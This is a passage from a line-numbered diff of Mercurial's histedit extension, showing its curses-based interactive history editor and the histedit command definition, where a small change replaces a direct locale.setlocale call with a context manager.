996 995 return True
997 996
998 997 def firstdate(self):
999 998 return True
1000 999
1001 1000
1002 1001 @action([b"drop", b"d"], _(b'remove commit from history'))
1003 1002 class drop(histeditaction):
1004 1003 def run(self):
1005 1004 parentctx = self.repo[self.state.parentctxnode]
1006 1005 return parentctx, [(self.node, tuple())]
1007 1006
1008 1007
1009 1008 @action(
1010 1009 [b"mess", b"m"],
1011 1010 _(b'edit commit message without changing commit content'),
1012 1011 priority=True,
1013 1012 )
1014 1013 class message(histeditaction):
1015 1014 def commiteditor(self):
1016 1015 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.mess')
1017 1016
1018 1017
1019 1018 def findoutgoing(ui, repo, remote=None, force=False, opts=None):
1020 1019 """utility function to find the first outgoing changeset
1021 1020
1022 1021 Used by initialization code"""
1023 1022 if opts is None:
1024 1023 opts = {}
1025 1024 dest = ui.expandpath(remote or b'default-push', remote or b'default')
1026 1025 dest, branches = hg.parseurl(dest, None)[:2]
1027 1026 ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
1028 1027
1029 1028 revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
1030 1029 other = hg.peer(repo, opts, dest)
1031 1030
1032 1031 if revs:
1033 1032 revs = [repo.lookup(rev) for rev in revs]
1034 1033
1035 1034 outgoing = discovery.findcommonoutgoing(repo, other, revs, force=force)
1036 1035 if not outgoing.missing:
1037 1036 raise error.Abort(_(b'no outgoing ancestors'))
1038 1037 roots = list(repo.revs(b"roots(%ln)", outgoing.missing))
1039 1038 if len(roots) > 1:
1040 1039 msg = _(b'there are ambiguous outgoing revisions')
1041 1040 hint = _(b"see 'hg help histedit' for more detail")
1042 1041 raise error.Abort(msg, hint=hint)
1043 1042 return repo[roots[0]].node()
1044 1043
1045 1044
1046 1045 # Curses Support
1047 1046 try:
1048 1047 import curses
1049 1048 except ImportError:
1050 1049 curses = None
1051 1050
1052 1051 KEY_LIST = [b'pick', b'edit', b'fold', b'drop', b'mess', b'roll']
1053 1052 ACTION_LABELS = {
1054 1053 b'fold': b'^fold',
1055 1054 b'roll': b'^roll',
1056 1055 }
1057 1056
1058 1057 COLOR_HELP, COLOR_SELECTED, COLOR_OK, COLOR_WARN, COLOR_CURRENT = 1, 2, 3, 4, 5
1059 1058 COLOR_DIFF_ADD_LINE, COLOR_DIFF_DEL_LINE, COLOR_DIFF_OFFSET = 6, 7, 8
1060 1059 COLOR_ROLL, COLOR_ROLL_CURRENT, COLOR_ROLL_SELECTED = 9, 10, 11
1061 1060
1062 1061 E_QUIT, E_HISTEDIT = 1, 2
1063 1062 E_PAGEDOWN, E_PAGEUP, E_LINEUP, E_LINEDOWN, E_RESIZE = 3, 4, 5, 6, 7
1064 1063 MODE_INIT, MODE_PATCH, MODE_RULES, MODE_HELP = 0, 1, 2, 3
1065 1064
1066 1065 KEYTABLE = {
1067 1066 b'global': {
1068 1067 b'h': b'next-action',
1069 1068 b'KEY_RIGHT': b'next-action',
1070 1069 b'l': b'prev-action',
1071 1070 b'KEY_LEFT': b'prev-action',
1072 1071 b'q': b'quit',
1073 1072 b'c': b'histedit',
1074 1073 b'C': b'histedit',
1075 1074 b'v': b'showpatch',
1076 1075 b'?': b'help',
1077 1076 },
1078 1077 MODE_RULES: {
1079 1078 b'd': b'action-drop',
1080 1079 b'e': b'action-edit',
1081 1080 b'f': b'action-fold',
1082 1081 b'm': b'action-mess',
1083 1082 b'p': b'action-pick',
1084 1083 b'r': b'action-roll',
1085 1084 b' ': b'select',
1086 1085 b'j': b'down',
1087 1086 b'k': b'up',
1088 1087 b'KEY_DOWN': b'down',
1089 1088 b'KEY_UP': b'up',
1090 1089 b'J': b'move-down',
1091 1090 b'K': b'move-up',
1092 1091 b'KEY_NPAGE': b'move-down',
1093 1092 b'KEY_PPAGE': b'move-up',
1094 1093 b'0': b'goto', # Used for 0..9
1095 1094 },
1096 1095 MODE_PATCH: {
1097 1096 b' ': b'page-down',
1098 1097 b'KEY_NPAGE': b'page-down',
1099 1098 b'KEY_PPAGE': b'page-up',
1100 1099 b'j': b'line-down',
1101 1100 b'k': b'line-up',
1102 1101 b'KEY_DOWN': b'line-down',
1103 1102 b'KEY_UP': b'line-up',
1104 1103 b'J': b'down',
1105 1104 b'K': b'up',
1106 1105 },
1107 1106 MODE_HELP: {},
1108 1107 }
1109 1108
1110 1109
1111 1110 def screen_size():
1112 1111 return struct.unpack(b'hh', fcntl.ioctl(1, termios.TIOCGWINSZ, b' '))
1113 1112
1114 1113
1115 1114 class histeditrule(object):
1116 1115 def __init__(self, ui, ctx, pos, action=b'pick'):
1117 1116 self.ui = ui
1118 1117 self.ctx = ctx
1119 1118 self.action = action
1120 1119 self.origpos = pos
1121 1120 self.pos = pos
1122 1121 self.conflicts = []
1123 1122
1124 1123 def __bytes__(self):
1125 1124 # Example display of several histeditrules:
1126 1125 #
1127 1126 # #10 pick 316392:06a16c25c053 add option to skip tests
1128 1127 # #11 ^roll 316393:71313c964cc5 <RED>oops a fixup commit</RED>
1129 1128 # #12 pick 316394:ab31f3973b0d include mfbt for mozilla-config.h
1130 1129 # #13 ^fold 316395:14ce5803f4c3 fix warnings
1131 1130 #
1132 1131 # The carets point to the changeset being folded into ("roll this
1133 1132 # changeset into the changeset above").
1134 1133 return b'%s%s' % (self.prefix, self.desc)
1135 1134
1136 1135 __str__ = encoding.strmethod(__bytes__)
1137 1136
1138 1137 @property
1139 1138 def prefix(self):
1140 1139 # Some actions ('fold' and 'roll') combine a patch with a
1141 1140 # previous one. Add a marker showing which patch they apply
1142 1141 # to.
1143 1142 action = ACTION_LABELS.get(self.action, self.action)
1144 1143
1145 1144 h = self.ctx.hex()[0:12]
1146 1145 r = self.ctx.rev()
1147 1146
1148 1147 return b"#%s %s %d:%s " % (
1149 1148 (b'%d' % self.origpos).ljust(2),
1150 1149 action.ljust(6),
1151 1150 r,
1152 1151 h,
1153 1152 )
1154 1153
1155 1154 @property
1156 1155 def desc(self):
1157 1156 summary = (
1158 1157 cmdutil.rendertemplate(
1159 1158 self.ctx, self.ui.config(b'histedit', b'summary-template')
1160 1159 )
1161 1160 or b''
1162 1161 )
1163 1162 if summary:
1164 1163 return summary
1165 1164 # This is split off from the prefix property so that we can
1166 1165 # separately make the description for 'roll' red (since it
1167 1166 # will get discarded).
1168 1167 return self.ctx.description().splitlines()[0].strip()
1169 1168
1170 1169 def checkconflicts(self, other):
1171 1170 if other.pos > self.pos and other.origpos <= self.origpos:
1172 1171 if set(other.ctx.files()) & set(self.ctx.files()) != set():
1173 1172 self.conflicts.append(other)
1174 1173 return self.conflicts
1175 1174
1176 1175 if other in self.conflicts:
1177 1176 self.conflicts.remove(other)
1178 1177 return self.conflicts
1179 1178
1180 1179
1181 1180 # ============ EVENTS ===============
1182 1181 def movecursor(state, oldpos, newpos):
1183 1182 '''Change the rule/changeset that the cursor is pointing to, regardless of
1184 1183 current mode (you can switch between patches from the view patch window).'''
1185 1184 state[b'pos'] = newpos
1186 1185
1187 1186 mode, _ = state[b'mode']
1188 1187 if mode == MODE_RULES:
1189 1188 # Scroll through the list by updating the view for MODE_RULES, so that
1190 1189 # even if we are not currently viewing the rules, switching back will
1191 1190 # result in the cursor's rule being visible.
1192 1191 modestate = state[b'modes'][MODE_RULES]
1193 1192 if newpos < modestate[b'line_offset']:
1194 1193 modestate[b'line_offset'] = newpos
1195 1194 elif newpos > modestate[b'line_offset'] + state[b'page_height'] - 1:
1196 1195 modestate[b'line_offset'] = newpos - state[b'page_height'] + 1
1197 1196
1198 1197 # Reset the patch view region to the top of the new patch.
1199 1198 state[b'modes'][MODE_PATCH][b'line_offset'] = 0
1200 1199
1201 1200
1202 1201 def changemode(state, mode):
1203 1202 curmode, _ = state[b'mode']
1204 1203 state[b'mode'] = (mode, curmode)
1205 1204 if mode == MODE_PATCH:
1206 1205 state[b'modes'][MODE_PATCH][b'patchcontents'] = patchcontents(state)
1207 1206
1208 1207
1209 1208 def makeselection(state, pos):
1210 1209 state[b'selected'] = pos
1211 1210
1212 1211
1213 1212 def swap(state, oldpos, newpos):
1214 1213 """Swap two positions and calculate necessary conflicts in
1215 1214 O(|newpos-oldpos|) time"""
1216 1215
1217 1216 rules = state[b'rules']
1218 1217 assert 0 <= oldpos < len(rules) and 0 <= newpos < len(rules)
1219 1218
1220 1219 rules[oldpos], rules[newpos] = rules[newpos], rules[oldpos]
1221 1220
1222 1221 # TODO: swap should not know about histeditrule's internals
1223 1222 rules[newpos].pos = newpos
1224 1223 rules[oldpos].pos = oldpos
1225 1224
1226 1225 start = min(oldpos, newpos)
1227 1226 end = max(oldpos, newpos)
1228 1227 for r in pycompat.xrange(start, end + 1):
1229 1228 rules[newpos].checkconflicts(rules[r])
1230 1229 rules[oldpos].checkconflicts(rules[r])
1231 1230
1232 1231 if state[b'selected']:
1233 1232 makeselection(state, newpos)
1234 1233
1235 1234
1236 1235 def changeaction(state, pos, action):
1237 1236 """Change the action state on the given position to the new action"""
1238 1237 rules = state[b'rules']
1239 1238 assert 0 <= pos < len(rules)
1240 1239 rules[pos].action = action
1241 1240
1242 1241
1243 1242 def cycleaction(state, pos, next=False):
1244 1243 """Changes the action state the next or the previous action from
1245 1244 the action list"""
1246 1245 rules = state[b'rules']
1247 1246 assert 0 <= pos < len(rules)
1248 1247 current = rules[pos].action
1249 1248
1250 1249 assert current in KEY_LIST
1251 1250
1252 1251 index = KEY_LIST.index(current)
1253 1252 if next:
1254 1253 index += 1
1255 1254 else:
1256 1255 index -= 1
1257 1256 changeaction(state, pos, KEY_LIST[index % len(KEY_LIST)])
1258 1257
1259 1258
1260 1259 def changeview(state, delta, unit):
1261 1260 '''Change the region of whatever is being viewed (a patch or the list of
1262 1261 changesets). 'delta' is an amount (+/- 1) and 'unit' is 'page' or 'line'.'''
1263 1262 mode, _ = state[b'mode']
1264 1263 if mode != MODE_PATCH:
1265 1264 return
1266 1265 mode_state = state[b'modes'][mode]
1267 1266 num_lines = len(mode_state[b'patchcontents'])
1268 1267 page_height = state[b'page_height']
1269 1268 unit = page_height if unit == b'page' else 1
1270 1269 num_pages = 1 + (num_lines - 1) // page_height
1271 1270 max_offset = (num_pages - 1) * page_height
1272 1271 newline = mode_state[b'line_offset'] + delta * unit
1273 1272 mode_state[b'line_offset'] = max(0, min(max_offset, newline))
1274 1273
1275 1274
1276 1275 def event(state, ch):
1277 1276 """Change state based on the current character input
1278 1277
1279 1278 This takes the current state and based on the current character input from
1280 1279 the user we change the state.
1281 1280 """
1282 1281 selected = state[b'selected']
1283 1282 oldpos = state[b'pos']
1284 1283 rules = state[b'rules']
1285 1284
1286 1285 if ch in (curses.KEY_RESIZE, b"KEY_RESIZE"):
1287 1286 return E_RESIZE
1288 1287
1289 1288 lookup_ch = ch
1290 1289 if ch is not None and b'0' <= ch <= b'9':
1291 1290 lookup_ch = b'0'
1292 1291
1293 1292 curmode, prevmode = state[b'mode']
1294 1293 action = KEYTABLE[curmode].get(
1295 1294 lookup_ch, KEYTABLE[b'global'].get(lookup_ch)
1296 1295 )
1297 1296 if action is None:
1298 1297 return
1299 1298 if action in (b'down', b'move-down'):
1300 1299 newpos = min(oldpos + 1, len(rules) - 1)
1301 1300 movecursor(state, oldpos, newpos)
1302 1301 if selected is not None or action == b'move-down':
1303 1302 swap(state, oldpos, newpos)
1304 1303 elif action in (b'up', b'move-up'):
1305 1304 newpos = max(0, oldpos - 1)
1306 1305 movecursor(state, oldpos, newpos)
1307 1306 if selected is not None or action == b'move-up':
1308 1307 swap(state, oldpos, newpos)
1309 1308 elif action == b'next-action':
1310 1309 cycleaction(state, oldpos, next=True)
1311 1310 elif action == b'prev-action':
1312 1311 cycleaction(state, oldpos, next=False)
1313 1312 elif action == b'select':
1314 1313 selected = oldpos if selected is None else None
1315 1314 makeselection(state, selected)
1316 1315 elif action == b'goto' and int(ch) < len(rules) and len(rules) <= 10:
1317 1316 newrule = next((r for r in rules if r.origpos == int(ch)))
1318 1317 movecursor(state, oldpos, newrule.pos)
1319 1318 if selected is not None:
1320 1319 swap(state, oldpos, newrule.pos)
1321 1320 elif action.startswith(b'action-'):
1322 1321 changeaction(state, oldpos, action[7:])
1323 1322 elif action == b'showpatch':
1324 1323 changemode(state, MODE_PATCH if curmode != MODE_PATCH else prevmode)
1325 1324 elif action == b'help':
1326 1325 changemode(state, MODE_HELP if curmode != MODE_HELP else prevmode)
1327 1326 elif action == b'quit':
1328 1327 return E_QUIT
1329 1328 elif action == b'histedit':
1330 1329 return E_HISTEDIT
1331 1330 elif action == b'page-down':
1332 1331 return E_PAGEDOWN
1333 1332 elif action == b'page-up':
1334 1333 return E_PAGEUP
1335 1334 elif action == b'line-down':
1336 1335 return E_LINEDOWN
1337 1336 elif action == b'line-up':
1338 1337 return E_LINEUP
1339 1338
1340 1339
1341 1340 def makecommands(rules):
1342 1341 """Returns a list of commands consumable by histedit --commands based on
1343 1342 our list of rules"""
1344 1343 commands = []
1345 1344 for rules in rules:
1346 1345 commands.append(b'%s %s\n' % (rules.action, rules.ctx))
1347 1346 return commands
1348 1347
1349 1348
1350 1349 def addln(win, y, x, line, color=None):
1351 1350 """Add a line to the given window left padding but 100% filled with
1352 1351 whitespace characters, so that the color appears on the whole line"""
1353 1352 maxy, maxx = win.getmaxyx()
1354 1353 length = maxx - 1 - x
1355 1354 line = bytes(line).ljust(length)[:length]
1356 1355 if y < 0:
1357 1356 y = maxy + y
1358 1357 if x < 0:
1359 1358 x = maxx + x
1360 1359 if color:
1361 1360 win.addstr(y, x, line, color)
1362 1361 else:
1363 1362 win.addstr(y, x, line)
1364 1363
1365 1364
1366 1365 def _trunc_head(line, n):
1367 1366 if len(line) <= n:
1368 1367 return line
1369 1368 return b'> ' + line[-(n - 2) :]
1370 1369
1371 1370
1372 1371 def _trunc_tail(line, n):
1373 1372 if len(line) <= n:
1374 1373 return line
1375 1374 return line[: n - 2] + b' >'
1376 1375
1377 1376
1378 1377 def patchcontents(state):
1379 1378 repo = state[b'repo']
1380 1379 rule = state[b'rules'][state[b'pos']]
1381 1380 displayer = logcmdutil.changesetdisplayer(
1382 1381 repo.ui, repo, {b"patch": True, b"template": b"status"}, buffered=True
1383 1382 )
1384 1383 overrides = {(b'ui', b'verbose'): True}
1385 1384 with repo.ui.configoverride(overrides, source=b'histedit'):
1386 1385 displayer.show(rule.ctx)
1387 1386 displayer.close()
1388 1387 return displayer.hunk[rule.ctx.rev()].splitlines()
1389 1388
1390 1389
1391 1390 def _chisteditmain(repo, rules, stdscr):
1392 1391 try:
1393 1392 curses.use_default_colors()
1394 1393 except curses.error:
1395 1394 pass
1396 1395
1397 1396 # initialize color pattern
1398 1397 curses.init_pair(COLOR_HELP, curses.COLOR_WHITE, curses.COLOR_BLUE)
1399 1398 curses.init_pair(COLOR_SELECTED, curses.COLOR_BLACK, curses.COLOR_WHITE)
1400 1399 curses.init_pair(COLOR_WARN, curses.COLOR_BLACK, curses.COLOR_YELLOW)
1401 1400 curses.init_pair(COLOR_OK, curses.COLOR_BLACK, curses.COLOR_GREEN)
1402 1401 curses.init_pair(COLOR_CURRENT, curses.COLOR_WHITE, curses.COLOR_MAGENTA)
1403 1402 curses.init_pair(COLOR_DIFF_ADD_LINE, curses.COLOR_GREEN, -1)
1404 1403 curses.init_pair(COLOR_DIFF_DEL_LINE, curses.COLOR_RED, -1)
1405 1404 curses.init_pair(COLOR_DIFF_OFFSET, curses.COLOR_MAGENTA, -1)
1406 1405 curses.init_pair(COLOR_ROLL, curses.COLOR_RED, -1)
1407 1406 curses.init_pair(
1408 1407 COLOR_ROLL_CURRENT, curses.COLOR_BLACK, curses.COLOR_MAGENTA
1409 1408 )
1410 1409 curses.init_pair(COLOR_ROLL_SELECTED, curses.COLOR_RED, curses.COLOR_WHITE)
1411 1410
1412 1411 # don't display the cursor
1413 1412 try:
1414 1413 curses.curs_set(0)
1415 1414 except curses.error:
1416 1415 pass
1417 1416
1418 1417 def rendercommit(win, state):
1419 1418 """Renders the commit window that shows the log of the current selected
1420 1419 commit"""
1421 1420 pos = state[b'pos']
1422 1421 rules = state[b'rules']
1423 1422 rule = rules[pos]
1424 1423
1425 1424 ctx = rule.ctx
1426 1425 win.box()
1427 1426
1428 1427 maxy, maxx = win.getmaxyx()
1429 1428 length = maxx - 3
1430 1429
1431 1430 line = b"changeset: %d:%s" % (ctx.rev(), ctx.hex()[:12])
1432 1431 win.addstr(1, 1, line[:length])
1433 1432
1434 1433 line = b"user: %s" % ctx.user()
1435 1434 win.addstr(2, 1, line[:length])
1436 1435
1437 1436 bms = repo.nodebookmarks(ctx.node())
1438 1437 line = b"bookmark: %s" % b' '.join(bms)
1439 1438 win.addstr(3, 1, line[:length])
1440 1439
1441 1440 line = b"summary: %s" % (ctx.description().splitlines()[0])
1442 1441 win.addstr(4, 1, line[:length])
1443 1442
1444 1443 line = b"files: "
1445 1444 win.addstr(5, 1, line)
1446 1445 fnx = 1 + len(line)
1447 1446 fnmaxx = length - fnx + 1
1448 1447 y = 5
1449 1448 fnmaxn = maxy - (1 + y) - 1
1450 1449 files = ctx.files()
1451 1450 for i, line1 in enumerate(files):
1452 1451 if len(files) > fnmaxn and i == fnmaxn - 1:
1453 1452 win.addstr(y, fnx, _trunc_tail(b','.join(files[i:]), fnmaxx))
1454 1453 y = y + 1
1455 1454 break
1456 1455 win.addstr(y, fnx, _trunc_head(line1, fnmaxx))
1457 1456 y = y + 1
1458 1457
1459 1458 conflicts = rule.conflicts
1460 1459 if len(conflicts) > 0:
1461 1460 conflictstr = b','.join(map(lambda r: r.ctx.hex()[:12], conflicts))
1462 1461 conflictstr = b"changed files overlap with %s" % conflictstr
1463 1462 else:
1464 1463 conflictstr = b'no overlap'
1465 1464
1466 1465 win.addstr(y, 1, conflictstr[:length])
1467 1466 win.noutrefresh()
1468 1467
1469 1468 def helplines(mode):
1470 1469 if mode == MODE_PATCH:
1471 1470 help = b"""\
1472 1471 ?: help, k/up: line up, j/down: line down, v: stop viewing patch
1473 1472 pgup: prev page, space/pgdn: next page, c: commit, q: abort
1474 1473 """
1475 1474 else:
1476 1475 help = b"""\
1477 1476 ?: help, k/up: move up, j/down: move down, space: select, v: view patch
1478 1477 d: drop, e: edit, f: fold, m: mess, p: pick, r: roll
1479 1478 pgup/K: move patch up, pgdn/J: move patch down, c: commit, q: abort
1480 1479 """
1481 1480 return help.splitlines()
1482 1481
1483 1482 def renderhelp(win, state):
1484 1483 maxy, maxx = win.getmaxyx()
1485 1484 mode, _ = state[b'mode']
1486 1485 for y, line in enumerate(helplines(mode)):
1487 1486 if y >= maxy:
1488 1487 break
1489 1488 addln(win, y, 0, line, curses.color_pair(COLOR_HELP))
1490 1489 win.noutrefresh()
1491 1490
1492 1491 def renderrules(rulesscr, state):
1493 1492 rules = state[b'rules']
1494 1493 pos = state[b'pos']
1495 1494 selected = state[b'selected']
1496 1495 start = state[b'modes'][MODE_RULES][b'line_offset']
1497 1496
1498 1497 conflicts = [r.ctx for r in rules if r.conflicts]
1499 1498 if len(conflicts) > 0:
1500 1499 line = b"potential conflict in %s" % b','.join(
1501 1500 map(pycompat.bytestr, conflicts)
1502 1501 )
1503 1502 addln(rulesscr, -1, 0, line, curses.color_pair(COLOR_WARN))
1504 1503
1505 1504 for y, rule in enumerate(rules[start:]):
1506 1505 if y >= state[b'page_height']:
1507 1506 break
1508 1507 if len(rule.conflicts) > 0:
1509 1508 rulesscr.addstr(y, 0, b" ", curses.color_pair(COLOR_WARN))
1510 1509 else:
1511 1510 rulesscr.addstr(y, 0, b" ", curses.COLOR_BLACK)
1512 1511
1513 1512 if y + start == selected:
1514 1513 rollcolor = COLOR_ROLL_SELECTED
1515 1514 addln(rulesscr, y, 2, rule, curses.color_pair(COLOR_SELECTED))
1516 1515 elif y + start == pos:
1517 1516 rollcolor = COLOR_ROLL_CURRENT
1518 1517 addln(
1519 1518 rulesscr,
1520 1519 y,
1521 1520 2,
1522 1521 rule,
1523 1522 curses.color_pair(COLOR_CURRENT) | curses.A_BOLD,
1524 1523 )
1525 1524 else:
1526 1525 rollcolor = COLOR_ROLL
1527 1526 addln(rulesscr, y, 2, rule)
1528 1527
1529 1528 if rule.action == b'roll':
1530 1529 rulesscr.addstr(
1531 1530 y,
1532 1531 2 + len(rule.prefix),
1533 1532 rule.desc,
1534 1533 curses.color_pair(rollcolor),
1535 1534 )
1536 1535
1537 1536 rulesscr.noutrefresh()
1538 1537
1539 1538 def renderstring(win, state, output, diffcolors=False):
1540 1539 maxy, maxx = win.getmaxyx()
1541 1540 length = min(maxy - 1, len(output))
1542 1541 for y in range(0, length):
1543 1542 line = output[y]
1544 1543 if diffcolors:
1545 1544 if line and line[0] == b'+':
1546 1545 win.addstr(
1547 1546 y, 0, line, curses.color_pair(COLOR_DIFF_ADD_LINE)
1548 1547 )
1549 1548 elif line and line[0] == b'-':
1550 1549 win.addstr(
1551 1550 y, 0, line, curses.color_pair(COLOR_DIFF_DEL_LINE)
1552 1551 )
1553 1552 elif line.startswith(b'@@ '):
1554 1553 win.addstr(y, 0, line, curses.color_pair(COLOR_DIFF_OFFSET))
1555 1554 else:
1556 1555 win.addstr(y, 0, line)
1557 1556 else:
1558 1557 win.addstr(y, 0, line)
1559 1558 win.noutrefresh()
1560 1559
1561 1560 def renderpatch(win, state):
1562 1561 start = state[b'modes'][MODE_PATCH][b'line_offset']
1563 1562 content = state[b'modes'][MODE_PATCH][b'patchcontents']
1564 1563 renderstring(win, state, content[start:], diffcolors=True)
1565 1564
1566 1565 def layout(mode):
1567 1566 maxy, maxx = stdscr.getmaxyx()
1568 1567 helplen = len(helplines(mode))
1569 1568 return {
1570 1569 b'commit': (12, maxx),
1571 1570 b'help': (helplen, maxx),
1572 1571 b'main': (maxy - helplen - 12, maxx),
1573 1572 }
1574 1573
1575 1574 def drawvertwin(size, y, x):
1576 1575 win = curses.newwin(size[0], size[1], y, x)
1577 1576 y += size[0]
1578 1577 return win, y, x
1579 1578
1580 1579 state = {
1581 1580 b'pos': 0,
1582 1581 b'rules': rules,
1583 1582 b'selected': None,
1584 1583 b'mode': (MODE_INIT, MODE_INIT),
1585 1584 b'page_height': None,
1586 1585 b'modes': {
1587 1586 MODE_RULES: {b'line_offset': 0,},
1588 1587 MODE_PATCH: {b'line_offset': 0,},
1589 1588 },
1590 1589 b'repo': repo,
1591 1590 }
1592 1591
1593 1592 # eventloop
1594 1593 ch = None
1595 1594 stdscr.clear()
1596 1595 stdscr.refresh()
1597 1596 while True:
1598 1597 try:
1599 1598 oldmode, _ = state[b'mode']
1600 1599 if oldmode == MODE_INIT:
1601 1600 changemode(state, MODE_RULES)
1602 1601 e = event(state, ch)
1603 1602
1604 1603 if e == E_QUIT:
1605 1604 return False
1606 1605 if e == E_HISTEDIT:
1607 1606 return state[b'rules']
1608 1607 else:
1609 1608 if e == E_RESIZE:
1610 1609 size = screen_size()
1611 1610 if size != stdscr.getmaxyx():
1612 1611 curses.resizeterm(*size)
1613 1612
1614 1613 curmode, _ = state[b'mode']
1615 1614 sizes = layout(curmode)
1616 1615 if curmode != oldmode:
1617 1616 state[b'page_height'] = sizes[b'main'][0]
1618 1617 # Adjust the view to fit the current screen size.
1619 1618 movecursor(state, state[b'pos'], state[b'pos'])
1620 1619
1621 1620 # Pack the windows against the top, each pane spread across the
1622 1621 # full width of the screen.
1623 1622 y, x = (0, 0)
1624 1623 helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
1625 1624 mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
1626 1625 commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
1627 1626
1628 1627 if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
1629 1628 if e == E_PAGEDOWN:
1630 1629 changeview(state, +1, b'page')
1631 1630 elif e == E_PAGEUP:
1632 1631 changeview(state, -1, b'page')
1633 1632 elif e == E_LINEDOWN:
1634 1633 changeview(state, +1, b'line')
1635 1634 elif e == E_LINEUP:
1636 1635 changeview(state, -1, b'line')
1637 1636
1638 1637 # start rendering
1639 1638 commitwin.erase()
1640 1639 helpwin.erase()
1641 1640 mainwin.erase()
1642 1641 if curmode == MODE_PATCH:
1643 1642 renderpatch(mainwin, state)
1644 1643 elif curmode == MODE_HELP:
1645 1644 renderstring(mainwin, state, __doc__.strip().splitlines())
1646 1645 else:
1647 1646 renderrules(mainwin, state)
1648 1647 rendercommit(commitwin, state)
1649 1648 renderhelp(helpwin, state)
1650 1649 curses.doupdate()
1651 1650 # done rendering
1652 1651 ch = encoding.strtolocal(stdscr.getkey())
1653 1652 except curses.error:
1654 1653 pass
1655 1654
1656 1655
1657 1656 def _chistedit(ui, repo, freeargs, opts):
1658 1657 """interactively edit changeset history via a curses interface
1659 1658
1660 1659 Provides a ncurses interface to histedit. Press ? in chistedit mode
1661 1660 to see an extensive help. Requires python-curses to be installed."""
1662 1661
1663 1662 if curses is None:
1664 1663 raise error.Abort(_(b"Python curses library required"))
1665 1664
1666 1665 # disable color
1667 1666 ui._colormode = None
1668 1667
1669 1668 try:
1670 1669 keep = opts.get(b'keep')
1671 1670 revs = opts.get(b'rev', [])[:]
1672 1671 cmdutil.checkunfinished(repo)
1673 1672 cmdutil.bailifchanged(repo)
1674 1673
1675 1674 if os.path.exists(os.path.join(repo.path, b'histedit-state')):
1676 1675 raise error.Abort(
1677 1676 _(
1678 1677 b'history edit already in progress, try '
1679 1678 b'--continue or --abort'
1680 1679 )
1681 1680 )
1682 1681 revs.extend(freeargs)
1683 1682 if not revs:
1684 1683 defaultrev = destutil.desthistedit(ui, repo)
1685 1684 if defaultrev is not None:
1686 1685 revs.append(defaultrev)
1687 1686 if len(revs) != 1:
1688 1687 raise error.Abort(
1689 1688 _(b'histedit requires exactly one ancestor revision')
1690 1689 )
1691 1690
1692 1691 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
1693 1692 if len(rr) != 1:
1694 1693 raise error.Abort(
1695 1694 _(
1696 1695 b'The specified revisions must have '
1697 1696 b'exactly one common root'
1698 1697 )
1699 1698 )
1700 1699 root = rr[0].node()
1701 1700
1702 1701 topmost = repo.dirstate.p1()
1703 1702 revs = between(repo, root, topmost, keep)
1704 1703 if not revs:
1705 1704 raise error.Abort(
1706 1705 _(b'%s is not an ancestor of working directory')
1707 1706 % node.short(root)
1708 1707 )
1709 1708
1710 1709 ctxs = []
1711 1710 for i, r in enumerate(revs):
1712 1711 ctxs.append(histeditrule(ui, repo[r], i))
1713 # Curses requires setting the locale or it will default to the C
1714 # locale. This sets the locale to the user's default system
1715 # locale.
1716 locale.setlocale(locale.LC_ALL, '')
1717 rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))
1712 with util.with_lc_ctype():
1713 rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))
1718 1714 curses.echo()
1719 1715 curses.endwin()
1720 1716 if rc is False:
1721 1717 ui.write(_(b"histedit aborted\n"))
1722 1718 return 0
1723 1719 if type(rc) is list:
1724 1720 ui.status(_(b"performing changes\n"))
1725 1721 rules = makecommands(rc)
1726 1722 with repo.vfs(b'chistedit', b'w+') as fp:
1727 1723 for r in rules:
1728 1724 fp.write(r)
1729 1725 opts[b'commands'] = fp.name
1730 1726 return _texthistedit(ui, repo, freeargs, opts)
1731 1727 except KeyboardInterrupt:
1732 1728 pass
1733 1729 return -1
1734 1730
1735 1731
1736 1732 @command(
1737 1733 b'histedit',
1738 1734 [
1739 1735 (
1740 1736 b'',
1741 1737 b'commands',
1742 1738 b'',
1743 1739 _(b'read history edits from the specified file'),
1744 1740 _(b'FILE'),
1745 1741 ),
1746 1742 (b'c', b'continue', False, _(b'continue an edit already in progress')),
1747 1743 (b'', b'edit-plan', False, _(b'edit remaining actions list')),
1748 1744 (
1749 1745 b'k',
1750 1746 b'keep',
1751 1747 False,
1752 1748 _(b"don't strip old nodes after edit is complete"),
1753 1749 ),
1754 1750 (b'', b'abort', False, _(b'abort an edit in progress')),
1755 1751 (b'o', b'outgoing', False, _(b'changesets not found in destination')),
1756 1752 (
1757 1753 b'f',
1758 1754 b'force',
1759 1755 False,
1760 1756 _(b'force outgoing even for unrelated repositories'),
1761 1757 ),
1762 1758 (b'r', b'rev', [], _(b'first revision to be edited'), _(b'REV')),
1763 1759 ]
1764 1760 + cmdutil.formatteropts,
1765 1761 _(b"[OPTIONS] ([ANCESTOR] | --outgoing [URL])"),
1766 1762 helpcategory=command.CATEGORY_CHANGE_MANAGEMENT,
1767 1763 )
1768 1764 def histedit(ui, repo, *freeargs, **opts):
1769 1765 """interactively edit changeset history
1770 1766
1771 1767 This command lets you edit a linear series of changesets (up to
1772 1768 and including the working directory, which should be clean).
1773 1769 You can:
1774 1770
1775 1771 - `pick` to [re]order a changeset
1776 1772
1777 1773 - `drop` to omit changeset
1778 1774
1779 1775 - `mess` to reword the changeset commit message
1780 1776
1781 1777 - `fold` to combine it with the preceding changeset (using the later date)
1782 1778
1783 1779 - `roll` like fold, but discarding this commit's description and date
1784 1780
1785 1781 - `edit` to edit this changeset (preserving date)
1786 1782
1787 1783 - `base` to checkout changeset and apply further changesets from there
1788 1784
1789 1785 There are a number of ways to select the root changeset:
1790 1786
1791 1787 - Specify ANCESTOR directly
1792 1788
1793 1789 - Use --outgoing -- it will be the first linear changeset not
1794 1790 included in destination. (See :hg:`help config.paths.default-push`)
1795 1791
1796 1792 - Otherwise, the value from the "histedit.defaultrev" config option
1797 1793 is used as a revset to select the base revision when ANCESTOR is not
1798 1794 specified. The first revision returned by the revset is used. By
1799 1795 default, this selects the editable history that is unique to the
1800 1796 ancestry of the working directory.
1801 1797
1802 1798 .. container:: verbose
1803 1799
1804 1800 If you use --outgoing, this command will abort if there are ambiguous
